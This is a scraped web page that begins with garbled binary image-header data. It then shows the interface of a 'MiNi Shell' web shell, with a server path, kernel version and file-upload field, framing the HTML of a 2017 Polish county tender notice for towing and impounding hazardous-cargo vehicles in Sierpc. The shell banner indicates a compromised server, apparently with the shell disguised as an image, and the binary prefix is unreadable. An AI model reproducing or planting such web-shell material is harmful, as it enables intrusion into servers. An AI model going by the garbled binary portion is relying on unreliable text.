JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170407/61020-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.sierpc.starstwo.gov.pl' target='_blank'>http://www.sierpc.starstwo.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 61020 - 2017
              z dnia 2017-04-07 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Sierpc: Usuwanie z drogi pojazdów przewożących materiały niebezpieczne łącznie                               z  przechowywaniem tych pojazdów na parkingu strzeżonym   w  okresie kwiecień 2017  marzec 2020  powtórzenie postępowania<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Starostwo Powiatowe w Sierpcu, krajowy numer identyfikacyjny
              61101920000000, ul.
              ul. Świętokrzyska 
              ,
              09200  
              Sierpc, woj.
              mazowieckie, państwo
              Polska, tel.
              024 2754648, 2758918, e-mail
              starosta@powiat.sierpc.pl, faks
              242 754 806.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.sierpc.starstwo.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Usuwanie z drogi pojazdów przewożących materiały niebezpieczne łącznie                               z  przechowywaniem tych pojazdów na parkingu strzeżonym   w  okresie kwiecień 2017  marzec 2020  powtórzenie postępowania<br /><b>Numer referencyjny: </b>ON.22.14.2.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>I Przedmiot zamówienia
1. Przedmiotem zamówienia jest świadczenie w latach 2017-2020 usługi usunięcia z dróg publicznych na terenie powiatu sierpeckiego oraz parkowania pojazdów, o których mowa w art. 130a ust. 1 lub 2 ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (Dz.U. z 2017 r. poz. 128), przy czym  są to wyłącznie pojazdy przewożące ładunki niebezpieczne.

2.Definicję drogi zawiera art. 2 ustawy Prawo o ruchu drogowym:
droga - wydzielony pas terenu składający się z jezdni, pobocza, chodnika, drogi dla pieszych lub drogi dla rowerów, łącznie z torowiskiem pojazdów szynowych znajdującym się w obrębie tego pasa, przeznaczony do ruchu lub postoju pojazdów, ruchu pieszych, jazdy wierzchem lub pędzenia zwierząt.
3. Przedmiot zamówienia wg Wspólnego Słownika Zamówień (CPV): 50118110-9 usługi holownicze oraz 98351100-9 usługi parkingowe.

II Charakterystyka przedmiotu zamówienia
1. Holowanie pojazdów oraz prowadzenie parkingu strzeżonego dla pojazdów usuniętych z dróg publicznych na terenie powiatu sierpeckiego w przypadkach określonych w art. 130a ust. 1 pkt 1 lub 2 ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (Dz.U. z 2017 r. poz. 128) należy od 21.08.2011 r. do zadań własnych powiatu.
2. Od Wykonawcy usługi wymaga się, aby:
1) Dysponował odpowiednio wyposażonymi i oznakowanymi pojazdami przeznaczonymi do usuwania i przemieszczania pojazdów;
2) Dysponował parkingiem  położonym na terenie powiatu sierpeckiego poza granicami administracyjnymi m. Sierpca spełniającym warunki podane w Rozporządzeniu Ministra Spraw Wewnętrznych z dnia 13.11.2012 r. w sprawie warunków technicznych parkingów, na które są usuwane pojazdy przewożące materiały niebezpieczne (Dz.U. z 2012 r. poz. 1293),
3) Wykonywał niezwłocznie i starannie każdą dyspozycję usunięcia pojazdu,
4) Umieszczał usunięty pojazd na parkingu własnym, zabezpieczonym przed dostępem osób trzecich poprzez trwałe ogrodzenie,  całodobowy dozór, oświetlenie i monitoring. 
5) Powiadamiał niezwłocznie o usunięciu pojazdu z drogi Wydział Komunikacji i Transportu Starostwa Powiatowego w Sierpcu i przekazywał kopię dyspozycji usunięcia.
6) O nieodebraniu pojazdu z parkingu w terminie 3 miesięcy od dnia jego usunięcia, ale nie później niż 3. dnia od dnia upływu tego terminu,  powiadamiał Starostę oraz podmiot, który wydał dyspozycję usunięcia.
7) Prowadził ewidencję pojazdów usuniętych z dróg, przyjętych na parking i wydanych z parkingu.<br /><br /><b>II.5) Główny kod CPV: </b>50118110-9<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/03/2020<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                Zamawiający dokona oceny spełniania przedmiotowego warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu złożonego przez Wykonawcę, odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o  działalności gospodarczej oraz poświadczoną za zgodność z oryginałem kserokopię aktualnego zezwolenia na wykonywanie zawodu przewoźnika drogowego w zakresie rzeczy.
<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                W celu oceny sytuacji ekonomicznej i finansowej Wykonawca złoży wraz z formularzem ofertowym oświadczenie o rocznym obrocie Wykonawcy w obszarze objętym zamówieniem za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres działalności jest krótszy  za ten okres (Załącznik Nr 2a do SIWZ). <br />
                Informacje dodatkowe
                Zamawiający dokona oceny spełniania przedmiotowego warunku na  oświadczenia złożonego przez Wykonawcę.<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca wykaże swe zdolności techniczne do realizacji zamówienia, wskazując na doświadczenie w realizacji podobnych usług w przeszłości  oraz wykaże, że dysponuje odpowiednią bazą osobową i specjalistycznym sprzętem, tj. że:
1) prowadzi działalność objętą tym zamówieniem i okresie ostatnich 3 lat lub w okresie krótszym  zrealizował usługi dla 2 zamawiających, przy czym każdą z nich realizował przez okres co najmniej 1 rok;
2) zatrudnia na umowę o pracę co najmniej 3 kierowców posiadających uprawnienia kategorii C+E oraz  wskaże jedną osobę zatrudnioną na umowę o pracę, która zajmuje się obsługą parkingu,.
3) dysponuje sprzętem do usuwania pojazdów o dopuszczalnej masie całkowitej do 3,5 t, sprzętem do usuwania pojazdów o dopuszczalnej masie całkowitej do 3,5 t z wysięgnikiem, dźwigiem i wciągarką, sprzętem do usuwania pojazdów o dopuszczalnej masie całkowitej od 3,5 t do powyżej 16 t, parkingiem depozytowym zlokalizowanym na terenie powiatu sierpeckiego (poza granicami administracyjnymi m. Sierpca)  spełniającym warunki podane w Rozporządzeniu Ministra Spraw Wewnętrznych z dnia 13.11.2012 r. w sprawie warunków technicznych parkingów, na które są usuwane pojazdy przewożące materiały niebezpieczne (Dz.U. z 2012 r. poz. 1293) o następujących parametrach:
a) z całodobowym dozorem i monitoringiem,
b)  powierzchnia parkingu nie mniej niż 500 m2,
c) parking wyposażony w garaż z zamykanymi drzwiami dla samochodów z uszkodzeniami powypadkowymi na nie mniej niż 2 samochody osobowe;
d)  parking oświetlony od zmierzchu do świtu;
e)  nawierzchnia parkingu utwardzona,
f) ogrodzenie parkingu trwałe;
g) wjazd na parking bezpośrednio z drogi publicznej.

4) gwarantuje ciągły kontakt telefoniczny z Zamawiającym w czasie realizacji przedmiotowych usług.
5) akceptuje wzór umowy dla części zamówienia, na które składa ofertę. <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Kierowcy z kategorią prawa jazdy C+E.</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu wykazania braku podstaw do wykluczenia z postępowania każdy z Wykonawców zobowiązany jest złożyć:
1) oświadczenie o braku podstaw do wykluczenia z postępowania, zgodnie z Załącznikiem Nr 3 do SIWZ;
2) aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego. że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie- odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w oprawie opłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o  działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub  ewidencji wraz z kserokopią  zezwolenia na wykonywanie zawodu krajowego przewoźnika w zakresie rzeczy;
5) oświadczenie ws. przynależności  lub braku przynależności do  tej samej grupy kapitałowej, o której jest mowa w art. 24 ust. 1 pkt 23 Pzp (Załącznik Nr 3a do SIWZ);
6) oświadczenie o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne (Załącznik Nr 3b do SIWZ);
7) oświadczenie o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia wolności lub grzywny w zakresie określonym przez Zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 Pzp (Załącznik Nr 3c do SIWZ);
8) oświadczenia o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym w zakresie określonym przez Zamawiającego na podstawie art. 24 ust. 5 pkt 7 ustawy (Załącznik Nr 3d do SIWZ);
9) Kopia polisy lub innego dokumentu ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
3. Zgodnie z art. 23 Pzp Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku    ich oferta musi spełniać następujące wymagania:
1) Wykonawcy występujący wspólnie ustanawiają Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego;
2) wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z Pełnomocnikiem;
3) wypełniając Formularz ofertowy, jak również inne dokumenty powołujące się na Wykonawcę w miejscu np.: nazwa i adres Wykonawcy należy wpisać dane dotyczące konsorcjum/spółki cywilnej, a nie Pełnomocnika konsorcjum/spółki cywilnej;
4) oferta winna być podpisana przez ustanowionego Pełnomocnika. 
5) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców na podstawie art. 25a ust. 6 Pzp Wykonawcy składają odrębne oświadczenia i dokumenty wskazane w tym Rozdziale SIWZ.
3. W przypadku, gdy Wykonawca ma zamiar powierzyć wykonanie części zamówienia podwykonawcom, składa oświadczenie (Załącznik Nr 4 do SIWZ).
4. W przypadku, gdy Wykonawca na podstawie art. 22a ust. 1 Pzp będzie polegać na  zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, przedstawia zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (Załącznik Nr 5 do SIWZ). Wykonawca dołączy do oferty wymienione w tym Rozdziale SIWZ dokumenty i oświadczenia dotyczące innych podmiotów.
5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w puncie 2. niniejszego Rozdziału SIWZ, składa dokumenty, które zostały określone w § 7 ust. 1-3  Rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia (Dz. U. z 2016 r. poz. 1126).
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />W celu wykazania spełnienia warunków udziału w postępowaniu, wraz z ofertą każdy z Wykonawców zobowiązany jest przedłożyć:
1) oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 25a ust. 1 Pzp - zgodnie ze wzorem określonym w Załączniku Nr 2 do SIWZ;
2) oświadczenie o rocznym obrocie Wykonawcy w obszarze objętym zamówieniem za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres działalności jest krótszy  za ten okres (Załącznik Nr 2a do SIWZ);
3) wypełniony w całości formularz ofertowy (Załącznik Nr 1 do SIWZ zawierający informacje pozwalające ocenić spełnienie warunków udziału w postępowaniu) wraz z załącznikami Nr 1a,1b,1c i 1d do SIWZ;
4) podpisany wzór umowy (Załącznik Nr 6 do SIWZ).<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />W postępowaniu o zamówienie publiczne zostanie wybrana oferta, która otrzyma największą liczbę punktów wynikającą z zastosowanych kryteriów.
Pmax = C + ZT
Kryterium wyboru oferty: cena - 60 %, zdolność techniczna - 40%.
Oferty zostaną ocenione przez Zamawiającego w oparciu o:
kryterium ceny = waga maksymalna kryterium  = 60 pkt.
   
gdzie: 
        Cp  - cena oferty
        C1   - najniższa oferowana cena  
        C2    - cena ocenianej  oferty                
              
kryterium: zdolność techniczna  waga 40%

Kryterium cena

Wartość kryterium ceny  dla części I zamówienia obliczy się przy zachowaniu następujących wag.

                  
                cena najniższa brutto 
      C=    ___________________________________    x 60 pkt
               cena oferowana brutto 

gdzie przez cenę usługi  (C) rozumie się sumę ceny za holowanie + cenę przechowywania pojazdu na parkingu strzeżonym przez 1 dobę + koszt odstąpienia.


  
Kryterium zdolność techniczna

Ocena tego kryterium zostanie dokonana na podstawie oświadczenia Wykonawcy               o liczbie kierowców zatrudnionych na umowę o pracę. Kryterium udziału w postępowaniu to 3 kierowców z prawem jazdy C + E zatrudnionych na podstawie umowy o pracę. Kryterium udziału zostaje przekształcone w kryterium selekcji, ponieważ każda liczba kierowców ponad wymagany w SIWZ limit podnosi jakość usługi i zwiększa jej niezawodność w przypadku wystąpienia dwóch zdarzeń drogowych w tym samym czasie.
W tym kryterium każdy wykazany przez Wykonawcę kierowca powyżej limitu to 8 pkt, co przy maksymalnym pułapie 5  zatrudnionych kierowców daje 40 pkt. 
Zamawiający oceni ofertę w tym kryterium  na podstawie Załącznika Nr 1d do SIWZ.
</div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">1) Tabela/e do  Formularza oferty  Załącznik Nr 1.
2) Wykaz zrealizowanych usług maksymalnie w okresie ostatnich 3 lat  Załącznik Nr 1a do SIWZ;
3) Wykaz posiadanego sprzętu do usuwania pojazdów, tj. sprzętu do usuwania pojazdów o dopuszczalnej masie całkowitej do 3,5 t z wysięgnikiem, dźwigiem i wciągarką oraz sprzętu do usuwania pojazdów o dopuszczalnej masie całkowitej od 3,5 t do powyżej 16 t  łącznie z  oświadczeniem o prawie władania, jeżeli pojazdy te nie są własnością Wykonawcy  Załącznik Nr 1b; 
